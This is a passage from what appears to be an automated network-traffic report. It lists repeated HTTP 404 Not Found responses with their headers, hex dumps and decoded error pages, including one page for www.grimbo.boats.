82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\b^U0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 22:07:15 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7sZYhGPN8UfK2XzMA%2BQ6xQQz5X%2FdEXNUPDfT50NHIptrBJ6bLMAJw5A4Y1wPyiu1juL6CO%2BPtXPCfRoJZZ4o3C4157raVJDUc5pZ7ZtTUDRpIWCiHD71HUC1v6XldruDWqux"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffffa98fac080d3-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1472&min_rtt=1472&rtt_var=736&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=769&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\^U
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 22:07:18 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h1LSCZap%2FjfVFRruKFfIcsziXKxf8KQLeO3oq8aVtRLmrjYpXDytdI7L4CtK5SJSXcJKHoRGpRhYPishLadCFnzA4PVTOKxluGC9vOlp4RdrwBwVijC5EGT1eOSS7D7M%2B2su"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffffaa8dde9435d-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1615&rtt_var=807&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1782&delivery_rate=0&cwnd=126&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\^U0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 22:07:20 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w0MsLdmLG8BZIyoU6j1qYC4H4H3iGusq%2F58Lh1WJVIyKQauJ9tyfOBHs8gcEADZwY5B%2FJJhT71X4BT05V68wfeP9CEhaEkts6mpwCLJ%2BlhP813Vf3eLMeFMeQrAc0eWMth1t"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffffab8e9b742f4-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1605&rtt_var=802&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=481&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 72 69 6d 62 6f 2e 62 6f 61 74 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Fri, 10 Jan 2025 22:07:40 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Fri, 10 Jan 2025 22:07:42 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Fri, 10 Jan 2025 22:07:45 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Fri, 10 Jan 2025 22:07:47 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 22:07:53 GMTServer: ApacheStrict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 22:07:56 GMTServer: ApacheStrict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 